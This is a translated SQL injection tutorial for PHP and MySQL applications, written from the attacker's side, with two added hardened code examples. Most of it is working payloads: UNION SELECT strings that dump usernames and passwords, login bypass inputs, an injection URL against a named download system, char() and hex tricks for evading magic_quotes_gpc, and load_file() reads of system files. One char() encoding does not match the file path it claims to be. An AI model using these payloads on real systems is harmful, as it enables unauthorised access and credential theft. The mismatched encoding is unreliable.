PHP Injection Explained in Detail (2)

Source: Internet
Author: User

Let's build an injection statement. Enter

a%' and 1=2 union select 1,username,3,4,5,6,7,8,password,10,11 from alphaauthor #

which, once placed into the SQL statement, becomes

select * from alphadb where title like '%a%' and 1=2 union select 1,username,3,4,5,6,7,8,password,10,11 from alphaauthor #%'

And there it is: the username and password come out. Everything is under control.

C: Now let's look at the various injection attack methods by injection location.
1) First, the background login.
Code first:
<?php
// login.php
.......
// The username and password from the form are concatenated straight into the
// query (this is the vulnerability the article discusses; kept as-is on purpose)
$query = "select * from alphaauthor where UserName='"
       . $HTTP_POST_VARS["UserName"] . "' and Password='"
       . $HTTP_POST_VARS["Password"] . "'";
$result = mysql_query($query);
$data = mysql_fetch_array($result);
if ($data)
{
    echo "background login successful";
}
else
{
    echo "re-login";
    exit;
}
.........
?>
The username and password are placed directly into the SQL statement without any processing.
Let's see how we can bypass it. The most classic one:
Enter  ' or ''='  as both the username and the password.
In the SQL statement this becomes:

select * from alphaauthor where UserName='' or ''='' and Password='' or ''=''

The $data obtained this way is always true, that is, we have logged in successfully.
Other methods work on the same principle: find a way to make $data return true.
We can use the following methods.
1.
Enter  ' or 'a'='a  as both the username and the password.
SQL:
select * from alphaauthor where UserName='' or 'a'='a' and Password='' or 'a'='a'

2.
Enter  ' or 1=1 and ''='
SQL:
select * from alphaauthor where UserName='' or 1=1 and ''='' and Password='' or 1=1 and ''=''

Enter  ' or 2>1 and ''='
SQL:
select * from alphaauthor where UserName='' or 2>1 and ''='' and Password='' or 2>1 and ''=''

3.
Username: enter  ' or 1=1 #   Password: anything at all
SQL:
select * from alphaauthor where UserName='' or 1=1 # ' and Password='anything'

Everything after the # is commented out, so of course the returned result is true.

4.
If the admin has id=1, you can use
Username: enter  ' or id=1 #   Password: anything at all
SQL:
select * from alphaauthor where UserName='' or id=1 # ' and Password='anything'

And that's it: we log straight in.

As the saying goes, there is nothing that cannot be done, only what has not yet been thought of.
There are more ways to construct this, left for you to think about after class.
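A hardened replacement for the login.php above, as an added example (not the article's code). It assumes an open mysqli connection in $db and that alphaauthor.Password stores a password_hash() digest rather than plaintext; both are assumptions.

```php
<?php
// Added example, not the article's code: hardened replacement for login.php.
// Assumes an open mysqli connection in $db and that alphaauthor.Password
// holds a password_hash() digest (both assumptions for this example).

function login(mysqli $db, string $username, string $password): bool
{
    // The SQL text is fixed and the username travels separately as a bound
    // parameter, so input such as  ' or ''='  or  ' or 1=1 #  is compared
    // literally as a username and never becomes part of the query syntax.
    $stmt = $db->prepare(
        'SELECT Password FROM alphaauthor WHERE UserName = ? LIMIT 1'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($hash);
    $found = $stmt->fetch();   // true = row found, null = no such user
    $stmt->close();
    if ($found !== true) {
        return false;
    }
    // The password is checked in PHP against the stored hash, so the
    // database never compares a user-supplied password at all and a
    // tautology typed into the password field has nothing to act on.
    return password_verify($password, $hash);
}

// Same control flow as the original, without building SQL from $_POST.
$username = (string) ($_POST['UserName'] ?? '');
$password = (string) ($_POST['Password'] ?? '');
if (login($db, $username, $password)) {
    echo "background login successful";
} else {
    echo "re-login";
    exit;
}
```

magic_quotes_gpc or addslashes() are not a substitute for this: they only escape quote characters, which, as section II below shows, does nothing when the value is placed into the query unquoted.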

2) The second common injection point is the front-end information display area.
I have already covered it many times, including numeric-type parameters and so on, so I will not repeat it here. Let's just give an example.
The Bihai Chaosheng download system v2.0.3 lite has an injection vulnerability; the code is not listed here, we look at the result directly:

http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users

Let's see what we get again: the username alpha and a long string for the password.
Why put the password in field 3 and the username in field 5? As mentioned above, we guess that fields 3 and 5 are strings; the field type of username and password must match the field in which we want them displayed, so that is where we put them.
Why 18 fields? Recall from the introduction to union select that the select before and after the union must have the same number of fields. We increase the number of select fields step by step until we find that 18 are required; only then is the content of the union select displayed normally.
3) Other operations that change data, such as user registration, which any application with user accounts must have.
We have already covered the update and insert statements above; since they are less common, they are not described again here. Some advanced uses of update and insert are discussed below.
II. Injection attacks when magic_quotes_gpc = On

When magic_quotes_gpc = On, every ' (single quote), " (double quote), \ (backslash) and NUL character in the request is automatically escaped with a backslash.
This makes injection into character-type (quoted) parameters fall flat. At that point we can only inject into numeric-type parameters that are not passed through intval(). We have already said a lot about the numeric type: because a numeric value is not wrapped in single quotes, there is no quote to escape, so it can be injected directly.
1) If the parameter is character-type, it must look like the following, with no quotation marks around the value.

Here we first need some string-handling functions.
MySQL has many string functions; we will mainly use the following one. For details, refer to the MySQL Chinese Reference Manual, section 7.4.10.

char() interprets its arguments as integers and returns a string made up of the characters with those ASCII codes.
You can also use a hexadecimal literal instead of the string: prefix the hex digits with 0x. See the example below.

<?php
// login.php
......
// $username is interpolated without quotes, $pw with quotes (as in the original)
$query = "select * from " . $art_system_db_table['user'] . "
          where UserName=$username and Password='" . $pw . "'";
......
?>

Suppose we know that the background username is alpha.
Converted with char() it is char(97,108,112,104,97).
In hexadecimal it is 0x616C706861.

All right, enter the following in the browser:

http://localhost/site/admin/login.php?username=char(97,108,112,104,97)%23

The SQL statement becomes:

select * from alphaAuthor where UserName=char(97,108,112,104,97) # and Password=''

As expected, it runs smoothly and we get what we wanted.
Of course, we can also construct

http://localhost/site/admin/login.php?username=0x616C706861%23

and the SQL statement becomes:

select * from alphaAuthor where UserName=0x616C706861 # and Password=''

Success once again; quite a sense of accomplishment.

Maybe you will ask whether we can put the # inside char().
char(97,108,112,104,97) is actually equivalent to 'alpha', quotation marks included: it denotes the string alpha.
We know that if you execute

mysql> select * from dl_users where username=alpha;
ERROR 1054 (42S22): Unknown column 'alpha' in 'where clause'

an error is returned, because MySQL treats the bare alpha as a column name rather than a string. So we have to put quotation marks around alpha, as follows:

mysql> select * from dl_users where username='alpha';

This is correct.
If you put the # inside, it becomes 'alpha #', and in the SQL statement

select * from dl_users where username='alpha #';

Of course nothing comes back, because there is no user named alpha #.
Okay, let's look at the next example.

<?php
// display.php
......
// $type is placed into the query unfiltered and without quotes
$query = "select * from " . $art_system_db_table['article'] . "
          where type=$type";
......
?>

The code displays content according to type. $type is not filtered and is put into the query without quotation marks.
Assume there is a type called xiaohua; converted with char(), xiaohua is char(120,105,97,111,104,117,97).

We build

http://localhost/display.php?type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor

and in the SQL statement:

select * from <article table> where type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor

Look: our username and password come out all the same.
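A safe version of display.php, added here as an example (not the article's code), that also covers the numeric dlid parameter from the download-site example above. It assumes an open mysqli connection in $db with mysqlnd (for get_result()), a table name that comes only from the application's own configuration, and a hypothetical dl_files table for the download lookup.

```php
<?php
// Added example, not the article's code. Assumes an open mysqli connection
// in $db (with mysqlnd, for get_result()); table names come only from the
// application's own configuration, never from the request.

function articles_by_type(mysqli $db, string $table, string $type): array
{
    // Identifiers cannot be bound as parameters, so the table name is
    // checked against a strict pattern and quoted with backticks.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $table)) {
        throw new InvalidArgumentException('invalid table name');
    }
    // "type = ?" receives the value through bind_param, so a request like
    //   type=char(120,105,97,111,104,117,97) and 1=2 union select ...
    // is compared as that literal string. Unlike magic_quotes_gpc, this
    // does not depend on the value being wrapped in quotes in the SQL.
    $stmt = $db->prepare("SELECT * FROM `$table` WHERE type = ?");
    $stmt->bind_param('s', $type);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

function download_by_id(mysqli $db, string $raw_id): ?array
{
    // For numeric parameters, validate before binding. intval() would
    // silently coerce "1 and 1=2 union select ..." to 1 and serve a
    // result; FILTER_VALIDATE_INT rejects anything that is not a whole
    // integer, so tampering is refused instead of masked.
    $id = filter_var($raw_id, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 'i' binds an integer, so the SQL stays "dlid = ?" with no string
    // concatenation at all. (The table name dl_files is an assumption.)
    $stmt = $db->prepare('SELECT * FROM dl_files WHERE dlid = ? LIMIT 1');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc() ?: null;
}

$rows = articles_by_type($db, $art_system_db_table['article'],
                         (string) ($_GET['type'] ?? ''));
$file = download_by_id($db, (string) ($_GET['dlid'] ?? ''));
```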

2) Some may ask whether the powerful load_file() can still be used when magic_quotes_gpc = On.
That is the problem we solve next. The format of load_file() is load_file('file path').
We find that you only need to convert the quoted 'file path' to char(). Try it:

load_file('C:/boot.ini')
load_file(char(111,111,116,46,105,110,105))

(Figure 22)

Put it into the actual injection:

http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,load_file(char(111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users

Let's see the boot.ini content.
Unfortunately, into outfile cannot be bypassed this way, or it would be even better. However, there is still one place where select * from table into outfile can be used, that is... (keeping you in suspense for now; we will tell you below).
